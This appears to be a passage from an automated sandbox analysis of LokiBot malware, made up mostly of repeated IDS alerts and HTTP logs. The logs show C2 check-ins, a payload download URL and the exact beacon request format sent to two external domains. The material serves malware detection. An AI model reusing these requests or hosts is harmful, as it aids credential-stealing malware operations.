          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49889 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49889 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49889 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49889 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49890 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49890 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49890 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49890 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49891 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49891 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49891 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49891 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49892 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49892 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49892 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49892 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49893 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49893 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49893 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49893 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49894 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49894 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49894 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49894 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49895 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49895 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49895 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49895 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49896 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49896 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49896 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49896 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49897 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49897 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49897 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49897 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49898 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49898 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49898 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49898 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49899 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49899 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49899 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49899 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49900 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49900 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49900 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49900 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49901 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49901 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49901 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49901 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49902 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49902 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49902 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49902 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49903 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49903 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49903 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49903 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49904 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49904 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49904 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49904 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49905 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49905 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49905 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49905 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49906 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49906 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49906 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49906 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49907 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49907 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49907 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49907 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49908 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49908 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49908 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49908 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49909 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49909 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49909 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49909 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49910 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49910 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49910 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49910 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49911 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49911 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49911 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49911 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49912 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49912 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49912 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49912 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49913 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49913 -> 192.185.217.246:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: https://afrocompass.com/karinedocesesalgados_Hpi
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox ViewASN Name: A2HOSTINGUS A2HOSTINGUS
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Joe Sandbox ViewIP Address: 192.185.217.246 192.185.217.246
          Source: global trafficHTTP traffic detected: GET /karinedocesesalgados_HpiSWwhaod1.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: afrocompass.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 178Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 3211Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
